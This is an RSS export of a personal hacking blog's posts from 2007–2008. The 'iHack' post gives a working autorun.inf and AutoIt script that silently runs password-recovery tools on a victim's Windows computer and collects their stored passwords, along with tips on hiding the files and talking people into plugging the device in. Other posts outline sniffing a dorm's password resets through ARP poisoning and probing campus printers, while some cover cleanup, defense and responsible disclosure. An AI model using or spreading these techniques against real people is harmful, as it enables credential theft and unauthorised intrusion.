<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kalimat al-Mutafalsif &#187; Hacking</title>
	<atom:link href="http://thesnarky.com/category/interests/security/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://thesnarky.com</link>
	<description>The Words of the One Who Calls Himself a Philosopher</description>
	<lastBuildDate>Tue, 26 Oct 2010 22:57:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>194.110.162.23</title>
		<link>http://thesnarky.com/2008/03/26/19411016223/</link>
		<comments>http://thesnarky.com/2008/03/26/19411016223/#comments</comments>
		<pubDate>Thu, 27 Mar 2008 03:19:10 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stupidity]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2008/03/26/19411016223/</guid>
		<description><![CDATA[At some point in the recent past my site was compromised by Wordpress.net.in spam. I don't know exactly when the back door was put in place since I haven't been very active on this site, though I do know that on March 20th 194.110.162.23 hit default-filters.php and uploaded the malicious code to inject spam into the footer of my pages. Unfortunately the attack is for a different version of Wordpress so rather than infect me with ads, it just screwed things up royally. Maybe that's a good thing as I noticed it.

A great write up of how to clean this mess up can be found <a href="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/">here</a>.

To sum it up:
<ul>
	<li>Remove wp-includes/class-mail.php, it's fake.</li>
	<li>Take out the lines hooking into the footer in wp-includes/default-filters.php</li>
	<li>Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.</li>
</ul>



The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.

EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.]]></description>
			<content:encoded><![CDATA[<p>At some point in the recent past my site was compromised by WordPress.net.in spam. I don't know exactly when the back door was put in place since I haven't been very active on this site, though I do know that on March 20th 194.110.162.23 hit default-filters.php and uploaded the malicious code to inject spam into the footer of my pages. Unfortunately the attack is for a different version of WordPress so rather than infect me with ads, it just screwed things up royally. Maybe that's a good thing as I noticed it.</p>
<p>A great write up of how to clean this mess up can be found <a href="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/">here</a>.</p>
<p>To sum it up:</p>
<ul>
<li>Remove wp-includes/class-mail.php, it's fake.</li>
<li>Take out the lines hooking into the footer in wp-includes/default-filters.php</li>
<li>Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.</li>
</ul>
<p>The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.</p>
<p>EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2008/03/26/19411016223/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iHack &#8211; The Beginning</title>
		<link>http://thesnarky.com/2007/11/06/ihack-the-beginning/</link>
		<comments>http://thesnarky.com/2007/11/06/ihack-the-beginning/#comments</comments>
		<pubDate>Tue, 06 Nov 2007 06:04:41 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[iPod]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/11/06/ihack-the-beginning/</guid>
		<description><![CDATA[A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works, but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.]]></description>
			<content:encoded><![CDATA[<p>A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works (God bless duct tape), but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.<br />
<span id="more-180"></span><br />
<strong>iHack</strong><br />
Now, you hopefully have gleaned from above that an iPod (and basically any media player) is just a hard drive that looks good. Shove some proprietary firmware on there, ask $300 and all of a sudden that <a href="http://www.rapidrepair.com/Merchant2/merchant.mvc?Screen=PROD&Product_Code=1616-iPod_Hard_Drive_Disk_MK6008GAH&Category_Code=">60GB laptop hard drive</a> just doubled or tripled in cost. What you end up buying is essentially a large thumb drive, or small external hard drive, depending on how you look at it, which means we can use it as such. This hack comes from the Spring '06 issue of 2600, though that article had some errors which I've addressed, and some parts (such as autorun) which were just completely left out. </p>
<p>In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course I'm targeting Windows in this, if you want to attack Macs or Linux, you just need to improvise a tad more).</p>
<p><strong>Setup</strong><br />
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:</p>
<blockquote><p>
[autorun]<br />
shellexecute=ipod.exe<br />
icon=ipod.ico</p></blockquote>
<p>What the above does is declare that it's the autorun file, set a custom icon for the iPod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab <a href="http://www.autoitscript.com/autoit3/">AutoIt</a>. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by <a href="http://www.nirsoft.net/utils/index.html">Nirsoft</a>, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacks\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder. </p>
<p>The icon I picked (since this is an iPod) was the following:<br />
<img src="http://thesnarky.com/html/pictures/ipod/ipod.ico" alt="" /></p>
<p>The exe we're going to create is made with the following AutoIt script which I won't go into detail on as it's fairly straightforward, though the formatting is really bad in WordPress, I apologize. A nice version of the file is found <a href="http://thesnarky.com/html/pictures/ipod/ipod.au3">here</a>.</p>
<p><em>Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)<br />
sleep(200)<br />
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)<br />
sleep(200)<br />
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)<br />
sleep(3000)<br />
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)<br />
sleep(3000)<br />
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC<br />
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'<br />
Dim $FileName = "all.log"<br />
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)<br />
sleep(3000)<br />
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)<br />
sleep(1000)</em></p>
<p>Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now; to check, double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not, go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?</p>
<p><strong>Execution</strong><br />
Now that we have a working autorun.inf and ipod.exe, it's as simple as unplugging your media device, then plugging it back in. Thankfully on Windows XP only CDs are allowed to run autorun with no user intervention so we need to click on the media device, however on older versions this stick will run itself. This is where offers of music work wonders. If a business executive will give out a <a href="http://news.bbc.co.uk/1/hi/technology/3639679.stm">password for a chocolate bar</a>, how many college students will let you open your iPod to give them free music? The first time you double click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?</p>
<p><strong>Expanding the Hack</strong><br />
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:</p>
<blockquote><p>
[autorun]<br />
shellexecute=http://www.stop-phishing.com<br />
icon=ipod.ico
</p></blockquote>
<p>I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to. </p>
<p>On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses, anything that can be done by a Windows executable and 60GB of space is possible here.</p>
<p><strong>Defense</strong><br />
I was remiss last night in posting this without a defense section. The easiest way to prevent it from Autoplaying is to hold shift while inserting any media. This goes for CDs or USB sticks (again on XP you only have to worry about CDs or U3 cruzers). If that fails, a handy trick can be found <a href="http://blogs.developerfusion.com/blogs/thushan/archive/2007/05/06/3066.aspx">here</a> to disable autorun in Windows. To quote Thushan Fernando:</p>
<ol>
<li>Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.</li>
<li>Goto 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'</li>
<li>When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.</li>
</ol>
<p>This option turns off autorun.inf from ever running and I highly recommend it.</p>
<p><strong>Research</strong><br />
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.</p>
<p>I hope to keep playing around with the iPod as a platform for hacking as it is so commonplace on a college campus. My ultimate goal probably being getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lay about.</p>
<p>And the best part of all this? You can perform the attack while listening to your favorite tunes!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/11/06/ihack-the-beginning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plaintext Passwords&#8230; Again!</title>
		<link>http://thesnarky.com/2007/05/25/plaintext-passwords-again/</link>
		<comments>http://thesnarky.com/2007/05/25/plaintext-passwords-again/#comments</comments>
		<pubDate>Fri, 25 May 2007 20:47:43 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/05/25/plaintext-passwords-again/</guid>
		<description><![CDATA[If you follow my blog, and sadly most of my readers have stopped checking, you'll remember the security hole I found on a major website around Valentine's Day. You should also remember I had a very good experience with the developers there, in terms of their competence and politeness. Well, I just tried to log [...]]]></description>
			<content:encoded><![CDATA[<p>If you follow my blog, and sadly most of my readers have stopped checking, you'll remember the <a href="http://thesnarky.com/2007/02/13/plain-text-passwords/">security hole</a> I found on a major website around Valentine's Day. You should also remember I had a very <a href="http://thesnarky.com/2007/02/21/plain-text-passwords-followup/">good experience</a> with the developers there, in terms of their competence and politeness. </p>
<p>Well, I just tried to log in to that site on an account I haven't used in... well.. a long time, let's leave it at that. Sadly, I'd forgotten my password, and they do a very smart thing in limiting how many failed logins one can have before resetting the password, forcing me to reset my password. Up to this point, everything is working as it should, removing the possibility of brute force attacks with only limited user annoyance every few months.</p>
<p>Then I noticed that... uh-oh... the reset page wasn't SSL. I thought "Oh, don't worry, I'll bet it's posted to an SSL domain," but grepping the source proved otherwise. Bugged, I decided to sniff my traffic and see what was happening, and sure enough, my password flew by in plaintext. This time it wasn't anything as stupid as a "Mother's Maiden Name" type question that also requires a little social engineering, this is MY PASSWORD, and MY USERNAME flying by. </p>
<p>Here's a look at a sanitized version of the information in the packet that gives it all away.</p>
<blockquote><p>
Content-Type:application/x-www-form-urlencoded<br />
Content-Length:102<br />
submitok=1<br />
cc=ff6cda68ba7b4c<br />
tt=1180114618<br />
email=****@****.***<br />
newpass1=PLAINTEXT<br />
newpass2=PLAINTEXT
</p></blockquote>
<p><strong>The Impact:</strong><br />
If I have to be sniffing the traffic in order to catch the password, this isn't as effective as, say, just phishing for the credentials, but this attack doesn't require any human stupidity. </p>
<p>However, this again is a very effective attack for large networks. <a href="http://en.wikipedia.org/wiki/ARP_poisoning">ARP Poisoning</a> is fairly trivial in this day and age, so even on a switched network one can grab these credentials. On a large network such as a dormitory, or campus this attack will work on as many people as are connected to the router you have access to. Worse, combine this with a botnet or other malware on a victim's machine, and it'll work on everyone who logs on to the site on an infected computer. </p>
<p>Another fun trick, as identified by the <a href="http://www.indiana.edu/~phishing/">researchers at Indiana University</a>, is subverting routers. If one subverts a router to modify the firmware, such an attack could easily be set up to happen on all traffic passing through the router, eliminating the need for ARP Poisoning. However, this requires an insecure router to start with, and the target would be a much smaller number.</p>
<p><strong>The Attack:</strong><br />
I'll talk through an attack from a dormitory, as that's the first I thought of. Once you're set up with your ARP Poisoning, it's time to get users to reset their password. Get a large list of email addresses from your school (this is very, very easy to script, you should be able to get tons of addresses). Now, you can either exploit the password reset security feature, or simply hit the reset.php page with each email address. Once you've reset the password, sit and sniff the network for any packets going to the page that actually does the resetting. Save all those packets, and you have all the information you need to compromise the accounts of everyone in your dorm!</p>
<p>I happen to know (whipped up a script to prove it) that this can quite easily be done in Perl where you never have to do anything, just sit and watch the logins go by.</p>
<p><strong>The Payoff:</strong><br />
Once you have all the logins, you can either be very malicious and overt, or very subtle and clever. One might immediately hit the account page to change the password to something to lock out the legitimate user, or maybe even delete the account. Or, to be clever, throw all the logins into a database for later exploitation. It'd be smarter to do the second, because then the attack will go unnoticed for a while.</p>
<p><strong>My Actions:</strong><br />
As usual, I'm accompanying this post with an email to the development squad of that website. I'm not releasing the name of the site, will delete any comments that say what site it is, and won't make my exploit code available anywhere. I will speak for the quality of the site's developers, from my last dealings with them, and know this will be fixed before any real attacks can be launched.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/05/25/plaintext-passwords-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fun had with Printers &#8211; In Depth</title>
		<link>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/</link>
		<comments>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/#comments</comments>
		<pubDate>Sat, 10 Mar 2007 05:12:54 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/147</guid>
		<description><![CDATA[I'm in a bad way right now. Personal issues just about every week have made this semester the semester from Hell. Well, today was the worst, I've almost snapped from stress, depression, lots of stuff. Not meaning for this to be emo, just want to set up what goes into these posts more. Anyways I went running tonight. Car's messed up, needed to get out so I just lit out runnin. Ended up (so far, nowhere near done) at the school library, wanting to do some hacking. A lot of my hacking is done when I'm trying to clear my mind of larger issues, which is how I get issues so bottled up inside that I can snap. This is a problem, but tonight, I just need an escape. So I *just* hit publish on a semi-decent write up of fun I've had with printers, I want to show you some more in depth.

I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my school's printers.]]></description>
			<content:encoded><![CDATA[<p>I'm in a bad way right now. Personal issues just about every week have made this semester the semester from Hell. Well, today was the worst, I've almost snapped from stress, depression, lots of stuff. Not meaning for this to be emo, just want to set up what goes into these posts more. Anyways I went running tonight. Car's messed up, needed to get out so I just lit out runnin. Ended up (so far, nowhere near done) at the school library, wanting to do some hacking. A lot of my hacking is done when I'm trying to clear my mind of larger issues, which is how I get issues so bottled up inside that I can snap. This is a problem, but tonight, I just need an escape. So I *just* hit publish on a semi-decent write up of fun I've had with printers, I want to show you some more in depth.</p>
<p>I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my school's printers.<br />
<span id="more-147"></span><br />
Tech specs: My school primarily uses <a href="http://www.hp.com">HP</a> printers, and specifically we have a LOT of <a href="http://h10010.www1.hp.com/wwpc/uk/en/sm/WF06a/5043-5343-5347-5347-5439-8263403.html">4350</a>'s. I really like these printers, not sure why because I don't know many printers by model number, but they're very user (read: hacker) friendly. Walked right up to one, figured out how to make it spill its guts half a minute later. They print rather fast (52 pages per minute, though PDFs take forever to spool up), and the quality's nice (1200x1200 dpi).</p>
<p>So what does this take? If you walk up to one of these (most modern printers you can adapt this technique to real easily) push the big green check mark button, this brings up the menu. Scroll down one, push the green button again, and you'll get "Information". The first item (if you've got my model) is "Print Menu map", go ahead and do this. In a few seconds, the printer will spit out a nice, two-sided, menu-mapping. Take this to your seat and pretend to proof-read it.<br />
<a href="http://thesnarky.com/html/pictures/printers/menumap.jpg"><img src="http://thesnarky.com/html/pictures/printers/menumap.jpg" alt="menumap of HP 4350 printer" /></a></p>
<p>Above you see the administrative section of the printer. Here's some fun stuff including its IP, and a wealth of other information. Note: Secure Web - Optional... bingo. The <a href="http://thesnarky.com/html/pictures/printers/config.jpg">other pages</a> have <a href="http://thesnarky.com/html/pictures/printers/config2.jpg">good information</a> as well, well worth poking around.</p>
<p>Let's type that IP we found into our browser, and note that it looks a lot like our printouts, just a prettier display. There doesn't appear, at first glance, to be any special admin control from here (other than being able to pause/resume print jobs), but still kind of cool (check out the "Control Panel" tab... you can read what's on the LCD!).</p>
<p><a href="http://thesnarky.com/html/pictures/printers/website.jpg"><img src="http://thesnarky.com/html/pictures/printers/website.jpg" alt="Website for HP 4350" /></a></p>
<p>Ok, that's just kinda cute recon, let's do some real hacking. The picture below is a handy little file tree that the printer will spit out for you. Please note, for those of you who don't know permissions, that there are 9 letters; r (read) w (write) x (execute) repeated three times. They specify the permissions for "owner group other".<br />
<img src="http://thesnarky.com/html/pictures/printers/files.jpg" alt="HP 4350 file structure" /></p>
<p>Now, our goal is to gain access to this file system, and if we can get FTP, or TELNET up and running, we can look at these lovely files. I'm going to leave that for another day, as I'm getting weird looks from the center desk staff of the library, and I've been here for a bit too long. Back to my run, I hope this was informative!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Power Attacks &#8211; Not Just For SIM Cards</title>
		<link>http://thesnarky.com/2007/03/01/power-attacks-not-just-for-sim-cards/</link>
		<comments>http://thesnarky.com/2007/03/01/power-attacks-not-just-for-sim-cards/#comments</comments>
		<pubDate>Thu, 01 Mar 2007 15:39:39 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/143</guid>
		<description><![CDATA[Well, I'm awake on time (9 am), done my workout, eating breakfast as we speak and I'm squeaky clean from my shower. This new morning routine gives me lots of time to ponder before starting my day, and I was reflecting on an interesting happening yesterday. Quickly summing it up, I was able to apply a hacking method for hardware to an AIM conversation, fun huh?]]></description>
			<content:encoded><![CDATA[<p>Well, I'm awake on time (9 am), done my workout, eating breakfast as we speak and I'm squeaky clean from my shower. This new morning routine gives me lots of time to ponder before starting my day, and I was reflecting on an interesting happening yesterday. Quickly summing it up, I was able to apply a hacking method for hardware to an AIM conversation, fun huh?</p>
<p>Quick language lesson: Power Attack - The name of a certain type of attack, usually used on hardware, that determines information from power drawn. This was originally used on smart cards where one could determine the encryption key by measuring the power drawn off the card at certain points in authentication.</p>
<p>So yesterday I was having a somewhat personal conversation with a girl who does CS-like stuff at a really cool University (cool in my mind for some working agreements they have with notable social networking sites). She's a good friend and we'd discussed this topic in the past, but for whatever reason I was being very standoffish. I'll take this time to point out there's nothing illicit going on, I just respect the privacy of anyone I talk to, and the conversation topic might identify her to people that know her. </p>
<p>Well conversation turned to a lighter topic, and involved a scientific equation that I try to live by. At most two people in the world (aside from me) know this equation... and it's a closely guarded Snarky-Secret, so it shan't be aired just yet, but after I mentioned this equation I noticed the little 'typing' icon on her GAIM window was on for about a minute. After which she replied "Absolutely true". I pointed out that that was an awfully long time to type such a small phrase, and was able to drag the real message out of her. </p>
<p>Now, that's just a stupid little case where a power attack actually worked, but I was darn proud. This shows that, for those of you who aren't hackers (probably a majority of my readers), you can still apply "hacker techniques" to any area of your life, regardless of if there's obvious overlap or not. Here a technique that's normally used against corporations (to find out when they're working), Smart Cards, and keyboards which effectively took down the most powerful defense known to man.... the female mind.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/03/01/power-attacks-not-just-for-sim-cards/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plain Text Passwords  &#8211; Followup</title>
		<link>http://thesnarky.com/2007/02/21/plain-text-passwords-followup/</link>
		<comments>http://thesnarky.com/2007/02/21/plain-text-passwords-followup/#comments</comments>
		<pubDate>Thu, 22 Feb 2007 04:48:38 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/141</guid>
		<description><![CDATA[This is just a quick update about <a href="http://thesnarky.com/archives/135">the story I posted last week</a> regarding a nice security hole in a major Internet Site. The tech support there have actually been really, really great in working with me to fix this problem. They emailed me an initial "Hey we got your report" the day I sent it out, and later this email I'm sharing with you. I initially expected to lose that account (and at one point today, I kinda wish I had), but so far it hasn't been locked or damaged in any way that I can see. I got an email from them that I'd like to share as an example of doing things the right way.
]]></description>
			<content:encoded><![CDATA[<p>This is just a quick update about <a href="http://thesnarky.com/archives/135">the story I posted last week</a> regarding a nice security hole in a major Internet Site. The tech support there have actually been really, really great in working with me to fix this problem. They emailed me an initial "Hey we got your report" the day I sent it out, and later this email I'm sharing with you. I initially expected to lose that account (and at one point today, I kinda wish I had), but so far it hasn't been locked or damaged in any way that I can see. I got an email from them that I'd like to share as an example of doing things the right way.</p>
<blockquote><p>Hi {Name},</p>
<p>We are aware of the issue that you described, and we will look into some possible solutions that won't disrupt page load times and general site performance. Thanks again, we appreciate the email and the blog post.</p>
<p>Thanks,</p>
<p>{Name}<br />
{Title}<br />
{Site}</p></blockquote>
<p>I fully expected something more along the lines of a Cease and Desist letter, as I've got quite a few friends who managed to procure those from simply pointing out insecurities. Apparently some corporations feel the correct response to an academic report of a bug on their site is the same response one would use for a malicious hacker attempting to exploit their site. This company, however, was different and literally turned my perspective around. I really, really did not like them for a variety of reasons (mainly revolving around security) but after this they get an A in my book.</p>
<p><strong>Bottom line: No code is flawless, it's how you deal with the bug reports that sets your site apart, not how perfect you can make it in the first place.</strong></p>
<p>These guys got it, and once the issue is resolved I might even put their name up here (with their permission) and support them openly because too few companies are that willing to accept criticism and security hole reports.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/02/21/plain-text-passwords-followup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plain Text Passwords</title>
		<link>http://thesnarky.com/2007/02/13/plain-text-passwords/</link>
		<comments>http://thesnarky.com/2007/02/13/plain-text-passwords/#comments</comments>
		<pubDate>Wed, 14 Feb 2007 03:47:22 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Annoyances]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stupidity]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/135</guid>
		<description><![CDATA[So I was feeling kinda down a few days ago, and I turned to the thing that always cheers me up, hacking. Nothing malicious, just seeing what bugs I could turn up. Found a great one dealing with why sites should use HTTPS instead of HTTP traffic by default. Oh, I've taken the liberty of attempting to clear out all links to my accounts. Don't worry, my account doesn't use that security question any longer. Also, because this post isn't malicious, I'm omitting the name of the site I found this on (and really, it could be any of the major sites out there, they all act a lot the same and I've yet to go check some other major ones) because they deserve anonymity as much as I do.]]></description>
			<content:encoded><![CDATA[<p>So I was feeling kinda down a few days ago, and I turned to the thing that always cheers me up, hacking. Nothing malicious, just seeing what bugs I could turn up. Found a great one dealing with why sites should use HTTPS instead of HTTP traffic by default. Oh, I've taken the liberty of attempting to clear out all links to my accounts. Don't worry, my account doesn't use that security question any longer. Also, because this post isn't malicious, I'm omitting the name of the site I found this on (and really, it could be any of the major sites out there, they all act a lot the same and I've yet to go check some other major ones) because they deserve anonymity as much as I do.<br />
<span id="more-135"></span><br />
<strong>DISCLAIMER<br />
I do not condone the breaking of any site's ToS, nor do I condone criminal acts. Nothing in this post is meant to be a how-to for idiots who feel the need to hurt others. This post is meant as an example of what not to do as we all can learn from each other's mistakes.</strong></p>
<p>Anyway, I noticed the other day that a certain site does a huge no no. They only use <a href="http://en.wikipedia.org/wiki/Http">http://</a> pages, no <a href="http://en.wikipedia.org/wiki/Https">https://</a>. Sure, they post the username and password to an https domain, but that's it. Many banks do this also, I can't explain why. Maybe they don't want their users to have to type an extra letter? Granted that's a moot point if you just throw a meta redirect from your http://myhomebank.com/index.html to your https:// domain, but I digress. </p>
<p>This is bad. Why is it bad? First off, if I do some <a href="http://en.wikipedia.org/wiki/Pharming">DNS pharming</a> I can make the user connect to my evildomain.com where I will change the form action for login to an http domain, or better yet my site. While I have never done this, as obviously that'd be illegal and I never do anything illegal, this is not very hard in a campus setting. While not trivial, dorm networks are normally vulnerable to <a href="http://en.wikipedia.org/wiki/ARP_poisoning">ARP poisoning</a>, and you can get ~1200 eager college freshmen each night logging into your system. Again, this is somewhat of a tangent, suffice it to say, users should *always* be trained to look for the nice yellow bar, and the https so they know they're logging into your site.</p>
<p>Why else should you only use https:// for large, profitable, sites? Because if it's http://, I can sniff your traffic. Sure, on a switched network I'd have to ARP poison the router to see the whole dorm's traffic, but I could also just <a href="http://www.indiana.edu/~phishing/papers/warkit.pdf">subvert the router</a> and install my sniffer there. Or sit in a computer lab that's wired with a hub (we've got at least two I know of) and see what ~40 people are doing at a time.</p>
<p>Of course, by now you realize that no confidential data ever goes over unsecure lines, right? Your web developers all know just how important your terms of service are. Yea, you can sense the sarcasm already, can't ya? So I poked around this site, and found their security question section they keep pestering me to set. Now this is a feature that almost all major sites have: "Set a security question so we can later identify you." It's not a bad idea at all. I may lose my password, and access to the email I registered with, yet you must now treat these security questions as if they're passwords, because they gain access to the account. Turns out this site sends this setting to their normal account editing php page and that's off a non-SSL secured domain. Which means if you've got a sniffer and a hub like me, it's quite easy to find. My laptop popped up this doozy.</p>
<p><em>0000  00 12 17 3c 68 d9 00 0f 1f 16 20 13 08 00 45 00   ...<h..... ...E.<br />
0010  00 f6 69 cf 40 00 40 06 2e 2b c0 a8 01 37 cc 0f   ..i.@.@..+...7..<br />
0020  14 19 d6 47 00 50 8b 52 2d ea 2b 55 1e 9a 50 18   ...G.P.R-.+U..P.<br />
